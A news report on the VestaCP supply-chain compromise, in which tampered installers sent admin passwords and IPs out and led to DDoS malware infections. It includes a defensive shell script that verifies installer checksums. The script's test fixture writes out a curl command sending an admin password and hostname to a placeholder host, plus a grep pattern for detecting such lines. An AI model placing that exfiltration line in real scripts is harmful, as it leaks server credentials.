Unknown attackers have compromised the official distribution of the VestaCP hosting control panel solution to harvest server IPs and admin credentials. That information was exploited to install malware with DDoS capabilities (Linux/ChachaDDoS) on victims’ web servers.
About the software
A web hosting control panel is a web-based interface provided by a web hosting service that allows users to manage their servers and hosted services.
There are many web hosting control panels out there.
Some are open source, others proprietary (cPanel, the most recognized name in control panels, falls into the latter category). Some work on specific platforms, others are cross-platform.
VestaCP is open source and can be installed on RHEL, CentOS, Debian and Ubuntu servers.
Were it not for the fact that the compromised servers were used for DDoS attacks and began using an abnormal amount of bandwidth, the compromise might not have been noticed for a while yet.
As it was, service providers began warning customers about it, and VestaCP users began complaining on the company’s online forum.
It took a while for the maintainers to figure out what happened.
“Our infrastructure server was hacked. Presumably using API bug in the release 0.9.8-20. The hackers then changed all installation scripts to log admin password and ip as addition to the distro name we used to collect stats,” they explained.
In fact, as one forum user discovered, this information was sent to vestacp.com, the official VestaCP domain. As the attackers presumably had access to the servers at the time, this is likely how it ended up in their hands.
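The mechanism the maintainers describe above, an installer modified so that the admin password and IP ride along with the distro name in the outbound stats request, is exactly what integrity checks on a downloaded installer are meant to catch before the script is ever run. The following is an added example, not VestaCP's own code: a POSIX shell script that verifies a downloaded installer against a pinned SHA-256 digest and then greps it for lines that pass a credential-looking variable to curl or wget. The file names, the stats URL, the fixture contents and the grep pattern are all constructed for illustration.

```shell
#!/bin/sh
# Added example (not VestaCP's code): verify a downloaded installer against a
# pinned SHA-256 digest and audit it for credential exfiltration before running it.

# Print the SHA-256 of a file, using whichever tool the host provides.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# Return 0 if the file's SHA-256 matches the expected digest, 1 otherwise.
verify_installer() {
    file="$1"
    expected="$2"
    actual=$(sha256_of "$file")
    [ "$actual" = "$expected" ]
}

# Print every line that hands a password-like variable to curl or wget.
# Return 0 when none are found (clean), 1 when at least one is found (review it).
# The pattern is a constructed heuristic, not a complete detection.
audit_exfil_lines() {
    file="$1"
    hits=$(grep -nE '(curl|wget).*\$[{]?[A-Za-z_]*(pass|PASS|Pass)' "$file" || true)
    if [ -n "$hits" ]; then
        printf '%s\n' "$hits"
        return 1
    fi
    return 0
}

# Build a constructed clean installer and a tampered copy in a temp dir; print the dir.
make_fixtures() {
    dir=$(mktemp -d)
    cat > "$dir/vst-install-clean.sh" <<'EOF'
#!/bin/sh
# constructed sample: only the distro name leaves the host (stats collection)
DISTRO=$(. /etc/os-release 2>/dev/null; echo "$ID")
curl -s "https://stats.example.invalid/?distro=$DISTRO" >/dev/null
EOF
    cp "$dir/vst-install-clean.sh" "$dir/vst-install-tampered.sh"
    # constructed sample: the tampered copy appends the admin password and IP to the stats call
    cat >> "$dir/vst-install-tampered.sh" <<'EOF'
ADMIN_PASS="$1"   # constructed: installer receives the admin password as its first argument
curl -s "https://stats.example.invalid/?distro=$DISTRO&pass=$ADMIN_PASS&ip=$(hostname)" >/dev/null
EOF
    printf '%s\n' "$dir"
}

FIXTURES=$(make_fixtures)
CLEAN="$FIXTURES/vst-install-clean.sh"
TAMPERED="$FIXTURES/vst-install-tampered.sh"

# Stand-in for a digest obtained out of band (a signed checksum file or release notes);
# here it is computed from the constructed clean fixture so the example runs offline.
PINNED_SHA256=$(sha256_of "$CLEAN")

for f in "$CLEAN" "$TAMPERED"; do
    if verify_installer "$f" "$PINNED_SHA256" && audit_exfil_lines "$f" >/dev/null; then
        echo "OK: $f"
    else
        echo "REJECT: $f"
    fi
done
```

The digest check is the control that matters: a modified script fails it regardless of what the modification does. The grep pass is a secondary, heuristic review aid for the case where no trustworthy digest exists, and it only flags the obvious pattern of a credential variable being placed in a curl or wget command line.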
VestaCP maintainers also called in outside security experts from Arcturus Security, and they pinpointed another security vulnerability that was exploited in some of the cases, allowing attackers to perform a “timing attack on password reset.”
All of these issues have now been fixed in VestaCP v0.9.8-23, and users have been urged to update their servers as soon as possible and to change their admin passwords.
The new release also searches for the Linux/ChachaDDoS binary on the server and notifies server admins if it finds it so they can remove it.
Users can also easily check whether their admin credentials have been harvested by entering their server’s IP address here.
More details about the malware can be found in this ESET blog post.